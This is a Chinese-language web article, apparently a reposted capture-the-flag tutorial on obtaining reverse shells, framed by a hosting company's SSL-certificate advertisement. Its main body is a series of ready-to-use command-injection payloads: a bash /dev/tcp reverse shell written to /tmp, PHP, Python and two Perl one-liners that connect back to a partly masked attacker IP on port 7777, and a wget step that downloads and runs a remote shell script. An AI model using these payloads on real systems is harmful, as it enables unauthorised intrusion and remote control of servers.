這篇文章主要講解了“怎么反彈shell”,文中的講解內(nèi)容簡單清晰,易于學(xué)習(xí)與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學(xué)習(xí)“怎么反彈shell”吧!
龍港ssl適用于網(wǎng)站、小程序/APP、API接口等需要進行數(shù)據(jù)傳輸應(yīng)用場景,ssl證書未來市場廣闊!成為創(chuàng)新互聯(lián)的ssl證書銷售渠道,可以享受市場價格4-6折優(yōu)惠!如果有意向歡迎電話聯(lián)系或者加微信:028-86922220(備注:SSL證書合作)期待與您的合作!
whoami是www-data權(quán)限,很低的權(quán)限;
pwd可查看到當(dāng)前路徑且判定是linux系統(tǒng);
ls -al查看了下當(dāng)前目錄下的讀寫執(zhí)行權(quán)限:
可以看出其他用戶是沒有高權(quán)限的,寫入執(zhí)行權(quán)限都沒有,就不能在當(dāng)前目錄下寫馬;經(jīng)嘗試,bash反彈shell未能成功。
第一題:exec "ping"
/tmp下有可寫可執(zhí)行權(quán)限,那么寫個bash反彈腳本上去:
127.0.0.1|Echo ‘bash -i >& /dev/tcp/47.107.x.xx/7777 0>&1’>/tmp/cdk.sh
vps上先監(jiān)聽,然后bash執(zhí)行腳本:
127.0.0.1|bash /tmp/cdk.sh
Payload:
127.0.0.1|php -r '$sock=fsockopen("47.107.xx.xxx",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
Payload:
127.0.0.1|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.107.xx.xx",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Payload1(依賴/bin/sh):
127.0.0.1|perl -e 'use Socket;$i="47.107.xx.xx";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Payload2(不依賴/bin/sh):
127.0.0.1|perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"47.107.xx.xx:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
第二題:exec "eval"
自己服務(wù)器上寫個反彈shell的sh,利用wget下載到目標(biāo)服務(wù)器,避免傳輸過程發(fā)生格式問題。
利用python啟用http服務(wù)。
執(zhí)行命令:
system('wget -P /tmp/ http://180.76.xx.xx:8000/drinkwater.sh')
執(zhí)行腳本,成功反彈shell:
system("bash /tmp/drinkwater.sh");
感謝各位的閱讀,以上就是“怎么反彈shell”的內(nèi)容了,經(jīng)過本文的學(xué)習(xí)后,相信大家對怎么反彈shell這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是創(chuàng)新互聯(lián),小編將為大家推送更多相關(guān)知識點的文章,歡迎關(guān)注!